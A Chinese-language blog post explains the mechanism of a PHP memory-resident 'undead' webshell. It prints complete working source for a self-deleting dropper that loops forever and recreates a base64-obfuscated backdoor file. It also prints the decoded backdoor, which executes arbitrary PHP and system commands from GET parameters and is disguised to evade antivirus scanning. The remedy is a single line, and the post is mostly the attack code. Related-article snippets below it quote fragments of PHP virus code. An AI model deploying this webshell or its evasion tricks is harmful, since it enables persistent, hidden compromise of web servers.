PHP内存木马病毒实现原理剖析

于 2022-10-22 23:43:03 发布
阅读量954 收藏 2
点赞数 1
分类专栏: PHP 安全 代码审计 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42100387/article/details/127469521
版权
PHP 同时被 3 个专栏收录
63 篇文章 4 订阅
订阅专栏
安全
4 篇文章 0 订阅
订阅专栏
代码审计
1 篇文章 0 订阅
订阅专栏

前言

  1. 内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。
  2. 网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。

正文

本文不讨论是由于任意文件上传还是近源攻击让生产服务器有了一段可访问的恶意代码。

病毒源代码(很简单)
<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = './getUserInfo.php';
//死循环常驻内存。释放木马文件
while(true) {
    if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0='));
    sleep(60);
}
释放病毒本体
<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET['e']);
if($e = @$_GET['e']) {
    $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7'));
    $func();
}

//system($_GET['s']);
if($s = @$_GET['s']) {
    $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx');
    $f($s);
}

说明

  1. 以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。
  2. 一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。
  3. 就算被释放的木马被识破后删除,还会产生同样的文件。

解决方案

干掉进程后,删除释放的木马文件。

小松聊PHP进阶
关注
专栏目录
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
最新发布
杨秀璋的专栏
04-18 575
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
PHP病毒扫描工具
06-30
最新D—盾web查杀工具,可扫描最新一句话病毒。可扫描图片、脚本及代码。支持恶意代码隔离与恢复。
php病毒
重剑无锋,大巧不工。。。
07-06 2231
//第一只php病毒(据说是) $handle=opendir(.); while ($file = readdir($handle)) { $infected=true; $executable=false; if ( ($executable = strstr ($file, .php)) || ($executable = strstr ($f
一个PHP病毒
行风
11-03 1359
https://gist.github.com/jrunning/1381296 Love You 0.76 代码和https://gist.github.com/jrunning/1381296/raw/56db75e09ebf1956e5e1a2254a021d8ed48cac97/wp-oju.php一样。
.php文件是病毒吗,php病毒
weixin_36301830的博客
04-07 569
//第一只php病毒(据说是)$handle=opendir('.');while ($file = readdir($handle)){ $infected=true;$executable=false;if ( ($executable = strstr ($file, '.php')) || ($executable = strstr ($file, '.htm')) || ($execut...
一淘模板分析PHP内存木马病毒原理
qq_29701691的博客
10-18 1627
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。就算被释放的木马被识破后删除,还会产生同样的文件。干掉进程后,删除释放的木马文件。
新型BlackEnergy(word宏)病毒分析
weixin_32223733的博客
04-22 2613
新型BlackEnergy(word宏)病毒分析前言BlackEnergy木马介绍BlackEnergy木马分析BlackEnergy木马攻击还原攻击场景搭建木马行为分析总结 目录 0X01 前言 1 0X02 BLACKENGERGY木马介绍 4 BlackEnergy 1 5 BlackEnergy 2 5 BlackEnergy 3 5 0X03 BLACKENGERGY木马分析 4 攻击流...
Linux病毒研究与分析
Go With Heart的专栏
08-05 4450
前言: 在我们日常生活中早就对windows中的病毒习惯了,对付windows中的病毒。我们有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 随着网络的发展,很多企业痘使用了Linux操作系统,原因主要是Linux的安全性比较高,但是Linux也会感染病毒。本文会对Linux病毒原理和如何防范做初步的介绍。 一、 Linux病毒史 1996年:破解组织V
教你如何处理杀不掉的病毒.php
12-12
教你如何处理杀不掉的病毒.php 教你如何处理杀不掉的病毒.php
php感染,最新感染PHP及网页文件的病毒PHP.Alf
weixin_42394206的博客
03-26 442
来自ESET的消息,新的专门感染PHP和Html文件的病毒及其变种于近期被发现,希望各位PHPer引起注意,及时升级您的杀毒软件。名称:PHP.Alf病毒类型:蠕虫感染长度:846字节危害级别:中传播速度:中技术特征:这是一个非常简单的病毒,专门感染后缀为.php、.htm及html的文件。病毒运行后,首先将自己改名为Script.php,为完成这一功能,它通过如下步骤进行:1、将自己更名为Dir...
发现了第一只php病毒PHP.Pirus
terrywang的专栏
12-21 882
发现了第一只php病毒PHP.Pirus 来源:http://www.sarc.com/avcenter/venc/data/php.pirus.html 发现时间:2000-9-11 最后更新时间: 2000-11-13下午0 4:02:47 (太平洋标准时间) PHP.Pirus是第一只被发现的用PHP写的病毒,它寻找扩展名为.php和.htm的文件,并插入代码去调用自己。这个病毒
后缀php有毒吗,新病毒PHP.Alf可感染PHP网页文件
weixin_33603377的博客
03-18 1168
新病毒PHP.Alf可感染PHP网页文件作者:CNETNews.com.cn2008-02-03 13:16:34名称:PHP.Alf病毒类型:蠕虫感染长度:846字节危害级别:低传播速度:慢技术特征:这是一个非常简单的病毒,专门感染后缀为.php、.htm及html的文件。病毒运行后,首先将自己改名为Script.php,为完成这一功能,它通过如下步骤进行:1、将自己更名为Dir.php;2、创...
php病毒图片后缀名,最新感染PHP及网页文件的病毒PHP.Alf_PHP教程
weixin_35682992的博客
03-13 175
来自ESET的消息,新的专门感染PHP和Html文件的病毒及其变种于近期被发现,希望各位PHPer引起注意,及时升级您的杀毒软件。名称:PHP.Alf病毒类型:蠕虫感染长度:846字节危害级别:中传播速度:中技术特征:这是一个非常简单的病毒,专门感染后缀为.php、.htm及html的文件。病毒运行后,首先将自己改名为Script.php,为完成这一功能,它通过如下步骤进行:1、将自己更名为Dir...
php可以写计算机病毒,新的蠕虫病毒能感染Linux和PHP的x86架构计算机病毒防范 -电脑资料...
weixin_33240862的博客
07-14 340
据美国国际数据集团(IDG)的新闻 —— 一个新的蠕虫病毒将目标指向那些运行了 Linux 和 PHP 的 x86 架构计算机,其变种还会对运行在其他芯片架构上的设备(诸如家用路由器和机顶盒)造成威胁,根据赛门铁克研究员的介绍,这种病毒利用 php-cgi 上的一个漏洞进行传播,这个 php-cgi 组件的功能是允许 PHP 代码在通用网关接口(CGI)的配置环境下被执行。此漏洞的代号为 CVE-...
公开PHP病毒源代码。声明:不准用于做破坏!
冰凌尘埃
09-08 2426
//第一只php病毒(据说是) $handle=opendir(.); while ($file = readdir($handle)) { $infected=true; $executable=false; if ( ($executable = strstr ($file, .php)) || ($executable = strstr ($file, .htm)) || (
今天收藏了两个PHP写的病毒,差点自己感染上,亏了有诺顿!
冰凌尘埃
09-02 1542
早就听说有PHP的病毒,一直没有见到过代码,今天总算见识了。出于安全考虑,我不共享代码了。大概看了下代码,很短,都是用PHP的文件操作函数写,详细的情况,等我仔细看代码后再说吧。 
世界上发现首例PHP病毒
ZCatLinux --资讯与技术社区--Open Source World----Linux/Shell/DevOPS--
08-09 948
世界上发现首例PHP病毒日期:2004-08-09???来源:eNews 【eNews消息】一个名为Central Command的反病毒公司发现,第一个用PHP Script语言(一种新型的CGI网络程序编写语言)编写的病毒开始感染计算机。当用户执行一个被感染了的脚本文件的时候,PHP.NewWorld病毒就会在糸统中迅速扩散,不管怎样,这个病毒只能在糸统内进行破
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小松聊PHP进阶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值